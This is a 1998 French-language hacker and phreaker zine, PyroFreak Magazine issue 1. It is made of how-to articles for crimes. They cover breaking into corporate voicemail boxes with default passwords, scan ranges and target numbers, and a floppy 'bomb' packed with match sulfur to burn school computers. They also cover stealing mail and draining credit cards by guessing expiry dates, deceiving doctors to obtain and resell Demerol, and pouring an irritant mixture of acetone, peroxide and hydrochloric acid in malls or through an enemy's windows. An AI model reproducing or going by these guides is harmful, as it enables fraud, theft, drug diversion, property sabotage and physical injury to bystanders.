Copy Link
Add to Bookmark
Report
PyroFreak Magazine Issue 01
-::-No slogan set
_____ _____ _ ______ ______ __ ___ _________
|: __ _ \ \ \ / / | ____ | / ___ |
| \__ _\ \ \ \/ ; / |; /_ _/ | / / /; |
| ____ __ ___\ \ : / |: _ / | / / : |
|: | / , / |, | \ : \ | :\__/ |
|; | ___/ . / |. | \ ; \ | ; /
|___\ \________/ |___\ \__ ____\ |_________/
____ _ ___ __ ___ ___ ______ __ _______
|: _ _ ;\ | \ \ \ / ;| | | / . /
| | \_______\ |: _\ \_ _\ / /| :| | ;| / /
_| |___ _____ |; |__ ____ / <_| ,| | |/ : /
|_|, ___| |; .\ | __\ \_:__\ / _ | | ;/
|: | |: ` / | :|____ ____ \ / |; | | |\ \
|; | |, |\ \ | ; \ \ ;\ \/ |: | |: | \ .\
|___\ |__| \_| |________\ \____\ |____| |___\ \_____\
-::>Month Topic: Réveillez-vous!!!!!!
Crédit: __2
1 Février 98
Mesdames et Messieurs, je vous presente le new zine pyrofreakmag.
Ca c'est un entre remarquable, mais j'ai hate de voir si je vais
m'habituer avec ce nom de zine la. Bon assez plaisanté maintenant.
Passons aux choses un peu plus serieuses.
INFORMATIONS
Premierement, Quel est le but de cette zine?:
Celle-ci a comme but de faire develloper l'under-
ground (surtout au Québec mais aussi dans tout autres endroit ou ca parle
francais), et cela dans plusieurs domaines, soit: Le hacking, le phreaking,
et toutes autres choses juger pertinantes pour nos lecteurs.
Deuxiement, a qui cet zine s'adresse t'elle?:
Pyrofreakmag s'adresse à tous les gens qui veulent
apprendre, cé clair et simple.
Troisiement, a quelle fréquence va etre distribuer Pyrofrakmag?:
Pyrofreakmag va etre distribuer a une frequence d'environ
1 fois par mois, mais cela sans avoir vraiment une date precise.
Quatriement, Comment nous rejoindre?:
Voici les moyens de rejoindre Pyrofreakmag et ses membres.
Soit sur IRC, sur #phreak.fr ,via le serveur undernet.
Soit par e-mail:
pyrofreakmag@hotmail.com | Pour tous les membres
neuro@warlordz.com | Pour rejoindre Neuro
lordendrix@hotmail.com | Pour rejoindre Endrix
psycopat@psycopat.com | Pour rejoindre psycopat
NuClEaR@nuc99.com | Pour rejoindre Nuclear
fuckyou@ass.hole | Pour le service des plaintes
Et vener visiter notre site web: http://pyrophreak.cjb.net
Si vous voulez que votre article paraisse dans le #2, envoyer le a
pyrofreakmag@hotmail.com . Ou si vous avez des questions, envoyer les aussi
a pyrofreakmag@hotmail.com . SVP, pas de question style: Comment hacker ou
Comment phreaker?
Cinquiement:
Les gens qui pensaient que ce zine allait juste s'Adresser au
phreaker, vous avez eux tord. Meme si on reprend frphreak, on a décider
de parler de underground en général, et non seulement du phreak.
Sixiement:
Pour une question d'estetique, j'ai decide de mettre aucun
accents dans cet zine (Un peu). Et pour une fois je vais essayer de me
forcer pour ne pas faire de faute d'ortographe ou de frappe, mais bon
je suis pas prof de francais.
FIN DE L'INTRO
Devise du zine:
Quand qu'on produit un zine, et qu'on est rendu au 17 ieme
numero, et que la qualitee du zine se deteriore, a cause du manque de d'idee,
aussi bien arreter ca la, au lieu de se rabaisser. (Je vise personne en par-
ticulier dans ce court paragraphe-ci.) J'en connais un qui va arreter de lire
le zine ici. :))))
La joke du zine:
<PsYkAoS> mange dla marde ptite couile
:)))))))))))))))))))))))))))
<Eric27> Ta tu fini avec tes aneries
Nouvelle du zine:
Yahoo a acheter geocities pour 3.9 milliards de dollars. Les
actions on grimpees de 47$ a 102$.
Vous devez lire ceci avant d'aller plus loin
Pyrofreakmag (et ses membres) tient a avertir les gens qui vont continuer
a lire le texte qui va suivre: Ont n'est aucunement responsable
des actes, et meme des pensés qui pourraient etre produites par les lecteurs
de ce zine par rapport a nos articles . Nous tenons a mettre cela bien au
clair. Si vous n'etes pas d'Accord avec cet affirmation, fermer ce texte,
et effacer le de votre disque dur ou sur tout autres disques. Vous etes
le seul responsable de vos actes.
____________________________________________________________________________
TABLE DES MATIERES
TITRE DE L'ARTICLE NICK DE L'AUTEUR
INTRO
1:Quelques conseils sur les VMBs Neuro
2:DiskBomb endrix
3:Numéros intéressant de téléphone Américain Neuro
4:Fini le trashing, allons y pour la poste! Neuro
5:Le Démérol Neuro
6:Pourquoi les gens pleurent? Neuro
7:WebPage Hacking endrix
8:Qui sont-ils ? [G]r4FX
CONCLUSION
____________________________________________________________________________
Quelques conseils sur les VMBs.
Par Neuro
Pour lire l'Article qui va suivre, vaut mieux avoir une base sur les VMBs,
pour celle-ci je vous conseille d'Aller lire NPC #4, en passant je trouve ce
zine exellent. Dans l'Article qui va suivre, je vais vous montrer, et
expliquer quelques techniques pour trouver et hacker une VMB plus facilement.
Petite définition de la VMB: C'est une boite vocale, qui est située sur
un réseau (Compagnie, commerce, autres).
Comment trouver une VMB local?
Rien de plus simple, je vous explique quelques techniques.
1- Regarder dans le botin téléphonique.
Comment trouver une VMB dans le botin téléphonique?
C'est simple, regarder dans les pages jaune dans la section des
entreprises, 90% du temps, celle-ci possede un systeme de VMB. Ou
regarder dans la section dentistes ou medecins. Si la clinique
possede juste un specialiste, c'est surement une boite vocale normal,
mais si vous voyer une annonce dans cette section, qui donne les noms
des spécialistes de cet etablissement, c'est qui a surement un reseau
de VMB.
Ya aussi un deuxieme moyen qui est un peu plus complexe, mais on obtient
de meilleurs résultats. Je vous explique le principe. Le numero de tele-
phone de la banque de votre ville est 454-9823. Il ne vous reste plus
qu'a essayer 5 chiffres plus bas et 5 chiffres plus haut, soit dans
l'exemple-ci qui serait de 454-9818 à 454-9828. Vous avez de bonne chance
de trouver un réseau de VMB qui est associer a la banque. Ceux-ci sont
intéressant, car 80% du temps elle contienne un systeme de PBX. Pour ceux
qui connaise pas ce que veux dire PBX, bien c'est un numero qui fais
transition entre votre numero, et le numero a appeler. Ce qui veux dire
que si vous faite des long distance, c'est le PBX qui paye. Et si vous
appeler quelqu'un, c'est le numero du PBX qui affiche sur afficheur (bell)
ou qui est retracer. C'est pourquoi, si vous hacker une VMB d'une banque,
vous risquer de faire deux pieres d'un coup. En passant quand vous scanner
, je vous conseille le *67, pour éviter les callback.
Ya deux avantages, et un désavantage sur les VMBs local.
Avantage #1: 70% du temps, une PBX les accompagnes
Avantage #2: Vous pouvez mettre en application le Social Engenering parce
que, 80% du temps. La personne a qui appartient la boite
vocale dit son nom au complet dans le message d'entrer. Ce
qui vous reste a faire, cé d'Aller dans le botin téléphonique
chercher son nom, et essayer les pass possible avec son
numero de tel ou avec son adresse. Si ca fonctionne pas, il
ne vous reste qu'a appeler la personne en question, et vous
faire passer pour un sondeur, et lui demander des questions,
style ca date de naissance de lui, ca femme et ces enfants et
tout autres renseignement que vous juger bon de demander qui
ont rapport au password.
Désavantage #1: Pour rejoindre la boite vocale, ou pour que des gens la
rejoindre, il faut etre dans la meme zone (bell) que celle-
ci, sinon il y aura des frais de long distance.
Comment trouver une VMB international (1-800)?
Le moyen le plus simple est en scannant. Pour scanner je vous conseil-
le programme toneloc, en passant vener pas me demander comment il fonctionne,
liser le help (J'Ai l'impression d'avoir déja vu cette phrase ailleur :)).
Je vais vous donner quelques séries de numeros a scanner, qui ont un bon
pourcentage de VMB.
1-800-247-XXXX
1-800-248-XXXX
1-800-251-XXXX
1-800-252-XXXX
1-800-253-XXXX
1-800-255-XXXX
1-800-257-XXXX
1-800-258-XXXX
1-800-523-XXXX
1-800-524-XXXX
1-800-525-XXXX
1-800-526-XXXX
1-800-527-XXXX
1-800-528-XXXX
Ici, le *67 est plus ou moins important, vu que dans plusieurs cas, c'est
des compagnies, et prennent pas le temps de vérifier le numero, et ca bien
sur si y'on la possibiliter.
Quand hacker,scanner les VMBs?
Cé simple, apres 21h et avant 7h am, vous risquez moins de rejoindre une
téléphoniste.
Pour les password!!
80% du temps, les password sont composer de 4 chiffres, c'est pourquoi voici
une liste de password par defaut:
0000
1111
2222
3333
4444
5555
6666
7777
8888
9999
1234
Si la boite vocale=318 le pass peut etre:
3180
0318
8130
Un autre type de password par défaut est d'essayer de 1945 a 1980, parce que
ya beaucoup de monde qui mette leur année de naissance.
Ou et quand composer le password?
Cela dépend du system auquel vous avez affaire. Dans tout les
cas, vous dever attendre que la VMB déclenche avant de faire quelque chose.
Quand le message d'intro démarre, appuyer sur ## ou ** ou *0 ou 81 ou #,
ou autre chose semblable a ca (*7,*1,*4). La il y a une demoiselle qui va
vous demander d'insérer le numero de la boite vocale ainsi que le password
et d'appuyer sur #. Ce qui veux dire que si la boite vocal est 318, et le
pass est 1234, vous tappez 3181234#. Si vous avec le bon password, vous
avez un acces total a la VMB. Vous pouvez changer le message d'intro,
envoyer des messages, effacers des messages et etc... Si vous etes pas
capable de trouver le pass, essayer un autre VMB, parce que y'En a tellement
, et beaucoup d'entre-elle on les password par defaut.
Conclusion
D'apres mon expérience, si vous avez un bon "cerveau", en moins de une heure
vous parviendriez a hacker une VMB. En passant, si vous hacker une sysAdmin,
(La box qui controle tout le réseau), vous pouvez creer a votre guise des
VMB ou en effacer (je vois pas l'utiliter), c'est la chose la plus interes-
sante dans un systeme de VMBs, le seul probleme, elle est plus dure a hacker,
parce qu'elle est souvent composer de 5 ou meme 6 chiffres pour le password.
Il y a beaucoup d'autres choses sur les VMBs, ca va surement aller dans le
#2.
Voici quelques VMBs que je vous donne, il ne vous reste plus qu'a les hacker.
1-800-468-4556 (Juste jour) *2 pour quitter le system
*3 et * 4 Pour choisir la Box
1-800-468-9012
1-800-468-3124
1-800-468-0755
1-800-821-1092 *4 le pass # 24/24 3 essais
1-800-821-4763 *4 le pass # 24/24 3 essais
1-800-526-0080
1-800-654-0089
____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1
: Question a faire réfléchir:
| Combien il y a de ip entre 1.1.1.1 et 255.255.255.255?
| Si vous le savez, envoyer nous un e-mail :)!
'.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __
===============================par endrix===============================
========================================================================
========================================================================
== ____ _ _ ____ _ ==
== | _ \(_)___| | _| __ ) ___ _ __ ___ | |__ ==
== | | | | / __| |/ / _ \ / _ \| '_ ` _ \| '_ \ ==
== | |_| | \__ \ <| |_) | (_) | | | | | | |_) | ==
== |____/|_|___/_|\_\____/ \___/|_| |_| |_|_.__/ ==
== ==
========================================================================
=Tu habites en outaouais et tu as les éditions précédentes de 2600 ??? =
= hey bien entre en contacte avec moi svp ... Je les cherches ... :) =
========================================================================
========================================================================
O===============O
<| c 0 n + 4 c t |>
O===============O
__________________________________________________________________
/ _____________________________________<-www.endrix.net->__________\
||Site Web : Http://endrix.cjb.net ||____¯_¯_¯_¯_¯_¯_¯_¯____________\
||Contact : lordendrix@hotmail.com ||______________________________|+|
||mIRC : #pirate, #grc, #hack.fr, #phreak.fr, #outaouais, #n0past |+|
\ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ /
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
O==========================O
<| 1 n + r 0 d u c + 1 0 n |>
O==========================O
Faire une bombe avec une disquette qui marche pu !! WAW quel exploit !!!
Pour le monde qui me croit pas que ca marche, 1N Y0UR F4C3 !!! Je l'ai
essayé sur mon vieux testeur de trojans, virus.. mon vieu boy(486 - 44)
Ca marche très bien, ya meme fallut que je charge mon floppy colisse...
Alors suivez tout a la lettre dans ce zine et vous allez pourvoir en faire
sur les ordinateurs de votre école ... :))) mouhhahhahaah !!!!
Err418 ---> Je veux pas que CHG me rip ca la ... (heehe, in ya face !!!)
O==================O
<| D 1 5 k B 0 m b |>
O==================O
------------------------------
-Les outils qu'il vous faut :-]
------------------------------
- Une vieille disquette (dans tes vieilles affaires)
- du vernie a ongle TRANSPARENT (demande a maman)
- Beaucoup d'allumettes (dans les affaires a papa)
- Un ordi a ton école (pour le ...testing...)
- Un petit bocal (va voir moman)
------------------------------
- H3r3 s+4rs+ 7h3 4c+10n ...:-]
------------------------------
1- Premièrement, il faut ouvrir la disquette DOUCEMENT !!!! Il faut faire
attention que le plastique ne casse pas, sinon ca va être plus dur la
refermer ...
2- Quant tu ouvres la disquette, tu vas voir 2 morceau de coton blanc pour
empêcher que le disque en tournant touche le plastique. Enleve-les ...
3- Prend n'importe quel outil pour faire ce qui suit sauf du papier sabler(duh!)
4- Il faut prendre le souffre qu'il y a sur les allumettes et le mettre dans
le petit bocal.
5- Avec le vernie a ongle, il faut mettre une petite-moyenne(huH?) couche sur
le disque.
6- Mettre du souffre sur le vernie a ongle(qui est sur le disque) et essayer de
le faire des 2 bords. C'est juste plus efficase mais c'est pas nécessaire.
7- Remettre le plastique sur le disque et refermer la disquette. Le vernie va
agir d'agent collant pour coller les deux plastique de la disquette.
8- Attendre que le vernie soie complètement sèche ... Et après se trouvé un ordi
sible, mettre la disquette dedans, l'allumer et PARTIRRRRRR !!!!!
9- Quand l'ordi va booter, il va pensé que c'est un boot disk(heehe) et il va lire
dessus. QUand le disque va tourner, le souffre va brulé et ansi va la vie ...
O=====================O
<| c 0 n c l u s 1 0 n |>
O=====================O
hey bien ... J'espère pour vous que l'ordinateur ne brulera pas !!! =P
C'est tout ce que j'ai a dire bordel...
____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1
: Si vous avez besoin d'une meche pour un explosif
| penser a une Cigarette!!!!
| Pour une plus longue durer il y a le Cigar!!!
'.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __
Numéros intéressant de téléphone Américain.
Par Neuro
Voici quelques numeros de telephone que j'ai découvert dans un zine
anglophone, vous pouvez peut-etre trouver une Utilitée a ceux-ci.
215-561-3199/SPRINT LONG DISTANCE
202-456-1414/WHITE HOUSE
011-441-930-4832/QUEEN ELIZABETH
916-445-2864/JERRY BROWN
800-424-9090/RONALD REAGAN'S PRESS
212-799-5017/ABC NEW YORK FEED LINE
800-882-1061/AT & T STOCK PRICES
212-986-1660/STOCK QUOTES
213-935-1111/WIERD EFFECTS!
512-472-4263/WIERD RECORDING
212-976-2727/P.D.A.
619-748-0002/FONE CO. TESTING LINES
900-410-6272/SPACE SHUTTLE COMM.
201-221-6397/AMERICAN TELEPHONE
215-466-6680/BELL OF PENNSYLVANIA
202-347-0999/CHESAPEAKE TELEPHONE
213-829-0111/GENERAL TELEPHONE
808-533-4426/HAWAIIAN TELEPHONE
312-368-8000/ILLINOIS BELL TELEPHONE
317-265-8611/INDIANA BELL
313-223-7233/MICHIGAN BELL
313-223-7223/NEVADA BELL
207-955-1111/NEW ENGLAND TELEPHONE
201-483-3800/NEW JERSEY BELL
212-395-2200/NEW YORK TELEPHONE
515-243-0890/NORTHWESTERN BELL
216-822-6980/OHIO BELL
206-345-2900/PACIFIC NORTHWEST BELL
213-621-4141/PACIFIC TELEPHONE
205-321-2222/SOUTH CENTRAL BELL
404-391-2490/SOUTHERN BELL
203-771-4920/SOUTHERN NEW ENGLAND
314-247-5511/SOUTHWESTERN BELL
414-678-3511/WISCONSIN TELEPHONE
800-327-6713/UNKNOWN ORIGIN
303-232-8555/HP3000
315-423-1313/DEC-10
313-577-0260/WAYNE STATE
512-474-5011/AUSTIN COMPUTERS
516-567-8013/LYRICS TIMESHARING
212-369-5114/RSTS/E
415-327-5220/NEC
713-795-1200/SHELL COMPUTERS
518-471-8111/CNA OF NY
800-327-6761/AUTONET
800-228-1111/VISA CREDIT CHECK
713-483-2700/NASUA
213-383-1115/COSMOS
408-280-1901/TRW
404-885-3460/SEARS CREDIT CHECK
414-289-9988/AARDVARK SOFTWARE
919-852-1482/ANDROMEDA INCORPORATED
213-985-2922/ARTSCI
714-627-9887/ASTAR INTERNATIONAL
415-964-8021/AUTOMATED SIMULATIONS
503-345-3043/AVANT GARDE CREATIONS
415-456-6424/BRODERBUND SOFTWARE
415-658-8141/BUDGE COMPANY
714-755-5392/CAVALIER COMPUTER
801-753-6990/COMPUTER DATA SYSTEMS
213-701-5161/DATASOFT INC.
213-366-7160/DATAMOST
716-442-8960/DYNACOMP
213-346-6783/EDU-WARE
800-631-0856/HAYDEN
919-983-1990/MED SYSTEMS SOFTWARE
312-433-7550/MICRO LAB
206-454-1315/MICROSOFT
301-659-7212/MUSE SOFTWARE
209-683-6858/ON-LINE SYSTEMS
203-661-8799/PROGRAM DESIGN (PDI)
213-344-6599/QUALITY SOFTWARE
303-925-9293/SENTIENT SOFTWARE
702-647-2673/SIERRA SOFTWARE
916-920-1939/SIRIUS SOFTWARE
215-393-2640/SIR-TECH
415-962-8911/SOFTWARE PUBLISHERS
415-964-1353/STRATEGIC SIMULATIONS
217-359-8482/SUBLOGIC COM.
206-226-3216/SYNERGISTIC SOFTWARE
1-800 Numero du Gouvernement USA:
800-321-1082:NAVY FINANCE CENTER.
800-424-5201:EXPORT IMPORT BANK.
800-523-0677:ALCOHOL TOBACCO AND.
800-532-1556:FED INFORMATION CNTR1-1082:NAVY FINANCE CENTER.
800-424-5201:EXPORT IMPORT BANK.
800-523-0677:ALCOHOL TOBACCO AND.
800-532-1556:FED INFORMATION CNTR.
800-325-4072:COMBAT & ARMS SERVICE.
800-325-4095:COMBAT SUPPORT BRANCH.
800-325-4890:ROPD USAR COMBAT ARMS.
800-432-3960:SOCIAL SECURITY.
800-426-5996:PUGET NAVAL SHIPYARD.
Autres:
301-234-0100:BALTIMORE ELECTRIC.
202-456-1414:WHITE HOUSE.
202-545-6706:PENTAGON.
202-343-1100:EPA.
714-891-1267:DIAL-A-GEEK.
714-897-5511:TIMELY.
213-571-6523:SATANIC MESSAGES.
213-664-7664:DIAL-A-SONG.
405-843-7396:SYNTHACER MUSIC.
213-765-1000:LIST OF MANY NUMBERS.
512-472-4263:WIERD.
512-472-9941:INSERT 25.
203-771-3930:PIONEERS.
213-254-4914:DIAL-A-ATHIEST.
212-586-0897:DIRTY.
213-840-3971:HOROWIERD
203-771-3930:PIONEERS
213-937-3580:TELENET
____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1
:
| Saviez vous que si vous etes arreter pour
| fraude informatique (600$), c'est une sentence 3 fois
| supérieur a un vol de véhicule (automobile,etc.)?
'.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __
Fini le trashing, allons y pour la poste!!!
Vous avez besoin de numero de carte de crédit? Vous avez besoin d'information
sur quelqu'un? Vous avez besoin d'argent? Vous me croiriez pas si je vous
disais que j'Ai la solution pour vous.Et cela grace a la poste (mail).
Pourquoi aller faire du trashing (fouiller dans les vidanges) pour trouver
des infos, quand on a juste a suivre le facteur durant une journer.
Je vous explique mon aventure!!
C'étais en un beau vendredi apres-midi. Je recois l'Appel de quelqu'un,
me disant ceci.
Drig
Drig
Drig
<Neuro> Hello
<Bobby> Slu
<Bobby> Hey mec, ca te tante tu de fêter a soir?
<Neuro> Pourquoi pas!
<Bobby> il y a un méga party chez nous, d'la bieres des filles, pis la musik
<Bobby> Juste 10$ l'entrer, pis t'amene ton stuck si tu veux fumer.
<Neuro> Ouais, cé intéressant, mais...
<Neuro> Il y a un probleme, j'Ai pas une cent
<Bobby> Ah, j'te connais ben, tu va t'arranger, fais aller ton esprit de
fraudeur comme d'habitude
<Bobby> En tk je t'attend
<Neuro> k
<Bobby> bye
<Neuro> bye
Apres avoir eu ce téléphone, fallais que je trouve du cash. Je me suis mis a
penser. Durant que je pensais, J'entendis le facteur déposer les lettres dans
ma boite a malle. Je vais chercher mes lettres. Une lueur de bonheur se
fit paraitre dans mes yeux, une lettre de ma tante quelques jours avant Noel.
C'est quoi??? Une carte disant Joyeux Noel? De l'argent pour me féliciter
d'etre aussi gentil? J'ouvre la lettre, hé oui, j'avais bien raison, une
lettre accompagner d'un beau billet de 50$. Mon problème étais résolu.
Tout d'un coup, une penser diabolique me vient en tete. Je me suis dit:
Si je recois du cash pour noel par la poste, je suis surement pas le seul
a qui sa arrive???. Et oui vous avez deviner, j'Ai suivi le facteur durant
une journer. Je vous explique comment procéder.
Chez nous, le facteur passe a 13h. A cette heure la, 80% des gens sont au
travail. Mais vous, vous avez prit conger, parce que vous avez besoin de cash.
Le facteur distribu les lettres a toutes les maisons de votre rue.Il ne vous
reste plus qu'a le suivre de quelques maisons, et de rammaser tout ce qui
est intéressant dans la boite a malle de la victime.
Soit:
Relever de carte de crédit.
Envellope normal
Petit colis.
Votre Revue préférer de la semaine.
Et tout autres affaire que vous juger intéressant.
Dans un relever de carte de crédit, vous avez le numero de la carte, nom de
la personne a qui appartient la carte,le solde,les fonts disponible sur
celle-ci. Il ne vous reste plus qu'a trouver la date d'expiration. Pas bien
dure. Vous aller sur un site de cul. Et vous vous abonner en essayant les
date d'Expiration une a une. Vous avez juste 48 possibilités, vu qu'habitu-
ellement, la date d'expiration est 4 ans apres l'entrer en vigueur de la
carte. Essayer de trouver tout autres informations intéressantes, mais
essayer de vous faire discret, en laissant quelques envelloppes dans la boite
a malle, pour pas que le propriétaire de celle-ci s'en apercoive trop
rapidement.
Quel est le meilleur temps pour faire ce truc?
C'Est simple, c'est la semaine avant noel. Juste en faisant une vingtaine
de maison, vous risquer de vous faire un minimum de 120$ facilement. Ce qui
devient tres payant a l'heure, vu que vous pouvez faire cela en 30 min.
Voici d'Autre temps durant l'année ou c'est assez payant.
-Durant la semaine avant Paque
-La semaine suivant la fin des cours (Primaire et secondaire).
-Si vous connaiser la date de fete de quelqu'un dans votre quartier
-St-Valentin
Si vous etes chanceux vous risquer meme de ramasser une vrai carte de crédit.
Dans ce cas la, vous avez qu'a aller magasiner, et la vider. Surtout qu'il
n'y a pas encore de signature au l'endo (Metter la votre), et que son
propriétaire ne sait pas qu'elle est en ce moment actif. Vous avez environ
3 jours pour la vider!!
Pour ceux qui sont plus bati, et qui aime travailler en équipe de 2 ou 3.
Je vous conseille de vous attaquer au boite rouge de Poste Canada, (Celle
pour l'extérieur de votre région, parce que le monde envois de l'argent en
cadeau quand c'est trop loin de chez-eux). Je vous explique le principe.
Vous préparer votre coup pour un dimanche soir, parce que ca fais plus qu'une
journer que la poste n'est pas venu rammaser le courriers. Vous vous metez
deux personnes, pour essayer de virer cette boite a mail a l'envers (Qui a
un poid qui est assez considérable, d'apres mon expérience, qui est pres de
175 a 200 lbs). Et la troisieme personne fais basculer la porte pour que les
lettres sortent de la mail. Si vous faite cela le dimanche avant Noel, vous
avez beaucoup de chance de vous faire minimum 70$ chaque (3). Mais si vous
en faite 5 comme ca, vous venez de multiplier le montant par 5, ca commence
a devenir intéressant.
Conclusion:
J'ai déja essayer de défoncer une boite verte (Ca équivaut a toutes les
boites rouge d'un quartier (environ 10), c'est tres tres tres résistant, et
meme avec de l'acide a 90% ca ne peut marcher, car il a un espace entre la
porte et la serrure. Dans le #2 je vais essayer d'etre plus précis en mettant
des photos dans mes textes.
Dans la premiere parti de ce texte je parlais bien sur, des boite a malle qui
sont au maison (sans serrure), et non celle qui sont en un bloc pour un
quartier complet,quoi que j'ai une bonne technique pour celle-ci,mais ca
va aller dans le #2.
____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1
:
| Saviez-vous que toutes zines sur underground
| qui ont été distribuer au public en francais depuis 1993,
| Correspond a l'équivalent d'un dictionaire en longueur de texte?
| Soit 2000 pages!!!
'.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __
Le démérol
Par Neuro
Déja en lisant le titre de cet article, vous avez plusieurs questions en tete:
Qu'est-ce que le démérol? A quoi ca sert le démérol? Comment en tirer profit?
J'ai réponse a vos questions dans les prochaines lignes.
Qu'est ce que le Démérol et a quoi sert-il?
Le démérol est un médicament tres puissant. Il sert a enlever la douleur.
On appele cette catégorie de Médicament, des anti-douleur (évidamment). Dans
cette meme classe on retrouve la morphine et l'héroine (Celle-ci n'est plus
vraiment utiliser de nos jours contre la douleur, a cause de sa dépendance
quel entraine). Le démérol est utiliser comme anti-douleur juste avant la
morphine, ce qui veut dire que celui-ci est tres puissant, mais bien entendu
moins que la morphine.
Avantage du démérol a la morphine:
-Cout moins éléver
-Peut etre sous forme de pilule a avaler
-Les médecins les prescrive plus facilement que la morphine, qui celle-ci
est quasi improcurable si vous n'etes pas hospitaliser.
-Dépendance moins élever
Comment en tirer profit?
Je vous explique le principe. Vous voulez tripper sans avoir de grosse
dépense. Et vous voulez tripper assez fort. La solution, le démérol.
Vous aller chez un médecin "débutant" (Qui en passant sont plus facile a
berner). Vous lui dite que vous avez de tres puissante crampe, et que vous
avez de la misere a marcher quand elles se produisent. La, dite lui que vous
avez déja eu ce probleme auparavant, et le medecin qui vous avais suivi vous
avait prescris du démérol. La, il va vous examiner un peu, et dans sa tete,
il va penser vous prescrire du démérol pour suivre son confrere.
Le medecin va vous demander combien de fois par jour, vous avez ce genre de
douleur. Dite y de 3 a 4 fois par jour. Si vous lui dite ca, vous avez de
forte chance d'avoir une prescription d'Environ 60 pilules de 50 mg de
démérol.Le cout est d'environ 25$, mais si vous etes assurer, le cout réduit
considérablement, et peut etre meme gratuit.Serait-ce une facon de frauder
le gouvernement??
La, le fun commence.
La premiere fois que vous allez prendre ca, vous aller en avoir assez de 3
pilules de 50mg. Vous allez voir le buzz que ca fais, et vous en redemanderez,
cé assurer. Le buzz dure environ 2h et cela de facon intense. Vous allez
etre parti dans les nuages, cé le cas de le dire.
Maintenant pour se faire du cash, il ne vous reste plus qu'a en vendre. Style,
3$ pour une pilule.Ce qui donne un bon profit si vous calculer:
3X60-25=155$
155 beau dollars de profit, et vous allez avoir des adeptes. Je veux vous
avertir que le démérol entraine une dépendance. Apres 4 ou 5 expérience,
il va vous falloir une plus grosse dose, soit 4 ou plus pilules. Et apres
quelques temps, cela peu monter beaucoup plus haut. Moi personnellement,
j'ai essayer 5 1/2 pilules, apres environ 2 sem d'utilisation, et j'avais
la meme effet quand j'en ai prit 3 pour la premieres fois, parce que on
s'habitu tres vite a cette subtance.
Attention: Prener pas plus que 3 pilules de 50 mg, dès votre premier trip,
parce que vous risqueriez de le regretter.
Attention: Le démérol engage une dépendance tres importante.
Attention: Il cause de la sommenolance, facque conduisez pas.
Bon c'étais l'idée principal que je voulais passer a travers ce texte. Pour
conclure, je voudrais dire que le démérol existe sous forme d'injection, soit
10$ pour 50 mg. Mais il vou faut une prescription, et elle est beaucoup plus
difficile a obtenir. Et je trip pas fort sur les aiguilles, tk. Bien entendu,
c'est beaucoup plus puissant, et ca la un effet tres rapide. Dans plusieurs
cas c'est le medecin lui meme qui l'injecte.
//en absence de démérol je n'avais pas d'alcool//
Crédit: Jean Leloup
____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #1
MODEM=MOdulateur-->DEModulateur :))))
'.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __
Pourquoi les gens pleurent?
Par Neuro
En un beau dimanche apres-midi, vous allez magasiner dans votre centre-
d'achat favoris. Tout-à-coup vous avez les larmes aux yeux, et vous n'etes
plus capable d'arreter de pleurer, et cela, pareil pour les gens qui
vous suivrent. Pourquoi? Deux possibiliter: Soit que tout le monde a une
bonne raison de pleurer, ou soit qu'un petit anarchiste a jouer un tour.
Dans l'article qui va suivre, je vais m'aborder sur la deuxieme possibiliter.
Matériaux nécessaire
500 ml d'acetone pur
On trouve l'acetone
la Quincaillerie du coin, dans la section
dilluant a peinture.
450 ml de Peroxyde 30%
On trouve le peroxyde 30% dans quelques pharmacies ,dans la section
teinture pour cheveux, ou dans un centre de coiffure. Bien important
faut pas que le peroxyde soit en crme comme a quelques endroits qui
en vendent, mais bien un liquide transparant comme de eau.
40 ml d'acide muriatique 20% (HCL)
On retrouve l'acide muriatique à la quincaillerie du coin, dans la
section piscine, ou dans un centre de la piscine.
ATTEMTION: Ce produit est tres dangereux, ne le respirer pas et
essayer de pas entrer en contact avec celui-ci.
1 Sac de magasinage
1 bouteille 2L de liquer vide
Vous etes a l'entrer du centre d'achat, cacher dans les buissons, ou dans
votre char (Je trouve la deuxieme possibiliter mieux que la premiere).
Vous mélanger c'est 3 produit ensemble dans une bouteille 2 litres de
liqueur, et vous brasser moyennement le tout et cela sans mettre le bouchon.
Vous metter la bouteille dans un sac en plastique de magasinage, de facon
quel soit debout, vu qu'il n'y a pas de bouchon. Vous rentrer dans le centre
d'achat, et vous vider votre bouteille dans une poubelle. En moins de 5 à 10
minutes, tout le monde qui vont passer a 20 pieds de la poubelle vont se
mettre a pleurer comme des petits fous, et vous, durant ce temps vous aller
vous bidonner dans un coin. Quand une personne passe pres de la poubelle,
les yeux vont lui commencer a bruler, ensuite une larme va tomber, et ensui-
te plusieurs larmes. Pour la victime, cela dure environ 15 min. Mais si
quelqu'un s'assoit sur le banc a coter de la poubelle en question, putain
de merde yé fou si il reste assis la plus que 2 minutes.
Pourquoi pas mettre le bouchon? Deux raison, Ca va mieux pour la vider dans
la poubelle, et vous ne risquer pas que la bouteille vous explose dans les
main.
Cela est un truc que moi-meme j'Ai découvert en faisant du peroxyde
d'acétone dans ma maison. Faite attention , si il y a des petits bébés
pres de la poubelle, cela va etre un peu moins drole pour vous, mais
dite vous que le centre-d'achat est un exemple comme un autre. Vous
pouvez mettre le produit au dessus d'une Urinoire (toilette acoter au mur).
La personne aura meme pas le temps de finir de pisser, quel va etre en
train de pleurer en ce demandant ce qui se passe.
Si vous avez un ennemi, vous aller chez-lui(dehors), et vous verser
le produit sur le rebord d'une fenetre ouverte. Essayer d'en choisir une
ou le vent est en votre faveur. Bien entendu cela doit etre fait durant
l'été ou autre moment que les fenetres sont ouvertes. Pour une plus grande
efficaciter, verser le produit sur le rebord de toutes les fenetres ouvertes.
La famille va sortir de la maison en courrant.
